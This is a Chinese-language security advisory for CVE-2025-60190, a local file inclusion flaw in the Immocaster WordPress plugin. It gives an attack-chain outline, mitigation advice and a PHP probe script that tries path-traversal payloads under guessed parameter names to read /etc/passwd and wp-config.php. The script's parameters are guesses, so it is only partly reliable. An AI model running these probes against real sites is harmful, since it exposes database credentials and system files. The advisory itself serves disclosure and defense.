CVE-2025-60190 Immocaster WordPress插件本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-60190

漏洞类型

本地文件包含(LFI)

CVSS评分

8.1 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Hinnerk Altenburg Immocaster WordPress Plugin

漏洞概述

CVE-2025-60190是Immocaster WordPress插件中的一个高危安全漏洞，CVSS评分8.1，属于本地文件包含（LFI）漏洞。该漏洞由于PHP程序中对文件名控制不当导致，允许攻击者通过构造恶意请求包含服务器上的任意本地文件。Immocaster是一款WordPress平台的房产管理插件，用于管理房产列表和相关信息。由于插件在处理文件包含请求时缺乏充分的输入验证，攻击者可以利用路径遍历技术（如使用../）来访问服务器上的敏感文件，包括配置文件、凭据文件或其他系统文件。此漏洞无需认证即可被利用，影响版本从n/a至1.3.6，威胁所有使用该插件的WordPress网站。攻击者可能利用此漏洞读取敏感配置信息，进而可能导致进一步的攻击，如远程代码执行。

技术细节

该漏洞属于OWASP Top 10中的A03:2021 - Injection类别。Immocaster插件在处理include或require语句时，未对用户可控的输入进行充分的安全验证。攻击者可以通过HTTP请求参数注入路径遍历序列（如../../）来包含服务器上的任意PHP文件或敏感文件。在PHP应用程序中，文件包含函数（如include、require、include_once、require_once）如果使用了未经清理的用户输入，攻击者可以操纵文件路径执行任意代码。典型的攻击场景包括：1）使用路径遍历读取/etc/passwd等系统文件；2）读取WordPress配置文件wp-config.php获取数据库凭据；3）包含日志文件或session文件实现远程代码执行。漏洞利用的关键在于识别插件中接受文件路径参数的功能点，然后构造包含恶意路径的请求。由于该插件是开源的，攻击者可以分析源代码定位具体的漏洞点。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别使用Immocaster插件的WordPress网站，通过搜索引擎或扫描工具发现目标

STEP 2

步骤2

分析阶段：攻击者下载并分析插件源代码，定位存在文件包含功能的文件，识别未过滤的用户输入参数

STEP 3

步骤3

漏洞探测：使用路径遍历载荷（如../../../）测试目标参数，验证文件包含漏洞是否存在

STEP 4

步骤4

敏感文件读取：利用漏洞读取wp-config.php获取数据库凭据，或读取/etc/passwd获取系统用户信息

STEP 5

步骤5

权限提升：结合其他漏洞（如远程代码执行）或利用获取的凭据进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
/**
 * CVE-2025-60190 PoC - Immocaster LFI
 * Target: Immocaster WordPress Plugin <= 1.3.6
 * Type: Local File Inclusion
 */

$target = "http://target-wordpress-site.com";
$plugin_path = "/wp-content/plugins/immocaster/";

// Common vulnerable parameters to test
$vulnerable_params = [
    "file",
    "inc",
    "include",
    "page",
    "path",
    "template"
];

// Target files to read
$target_files = [
    "../../../../../../../etc/passwd",
    "../../../../../../../wp-config.php",
    "../../../../../../../var/www/html/wp-config.php"
];

foreach ($vulnerable_params as $param) {
    foreach ($target_files as $file) {
        $url = $target . $plugin_path . "?" . $param . "=" . urlencode($file);
        echo "[*] Testing: " . $url . "\n";
        
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_TIMEOUT, 30);
        $response = curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        
        if ($http_code == 200 && strpos($response, "root:") !== false) {
            echo "[!] VULNERABLE! Found: " . $file . "\n";
            echo $response;
        }
    }
}
?>

影响范围

Immocaster WordPress Plugin <= 1.3.6

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时措施：1）限制用户对插件功能的访问权限；2）配置Web服务器防止访问敏感文件；3）禁用不必要的PHP函数如allow_url_include；4）使用ModSecurity等WAF规则阻止包含../的请求；5）考虑暂时禁用Immocaster插件直至漏洞修复；6）实施文件完整性监控，及时发现未授权的文件访问行为。